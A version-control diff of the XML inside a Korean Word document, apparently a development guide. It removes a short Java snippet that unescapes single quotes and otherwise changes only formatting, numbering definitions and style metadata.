-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t xml:space="preserve">Matcher </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>matcher</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>unescapePattern.matcher</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>originalValue</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t>if (</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>matcher.find</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>()) {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:tab/>
-              <w:t xml:space="preserve">return </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>matcher.replaceAll</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve">("'"); // </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>싱글쿼터로</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 치환</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:left="800"/>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
@@ -3294,6 +3468,9 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="1374"/>
+        </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1206" w:type="dxa"/>
@@ -3341,7 +3518,7 @@
                 <w:noProof/>
               </w:rPr>
               <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32339086" wp14:editId="7F3C2B1C">
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="598C0540" wp14:editId="6BB24D8D">
                   <wp:extent cx="4107396" cy="726141"/>
                   <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                   <wp:docPr id="1" name="그림 1"/>
@@ -3356,7 +3533,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill rotWithShape="1">
-                          <a:blip r:embed="rId8"/>
+                          <a:blip r:embed="rId7"/>
                           <a:srcRect b="10989"/>
                           <a:stretch/>
                         </pic:blipFill>
@@ -3517,7 +3694,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">비즈니스 </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -3540,21 +3716,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">사용자 입력 값이 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>뷰에</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 노출시킬 목적이 아닌 비즈니스 </w:t>
+        <w:t xml:space="preserve">사용자 입력 값이 뷰에 노출시킬 목적이 아닌 비즈니스 </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3657,7 +3819,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
   <w:abstractNum w:abstractNumId="0">
     <w:nsid w:val="33AD3F0F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
@@ -3950,6 +4112,118 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="3">
+    <w:nsid w:val="6CEE3734"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="AD787522"/>
+    <w:lvl w:ilvl="0" w:tplc="44888CEC">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cstheme="minorBidi" w:hint="eastAsia"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1760" w:hanging="480"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2240" w:hanging="480"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2720" w:hanging="480"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3200" w:hanging="480"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3680" w:hanging="480"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4160" w:hanging="480"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4640" w:hanging="480"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5120" w:hanging="480"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4">
     <w:nsid w:val="7B7804BA"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="82B49E82"/>
@@ -4038,7 +4312,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4">
+  <w:abstractNum w:abstractNumId="5">
     <w:nsid w:val="7E654D84"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3244C236"/>
@@ -4155,22 +4429,25 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="3">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="4">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="5">
     <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="3"/>
   </w:num>
 </w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -4187,144 +4464,389 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
-    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
-    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
-    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
-    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
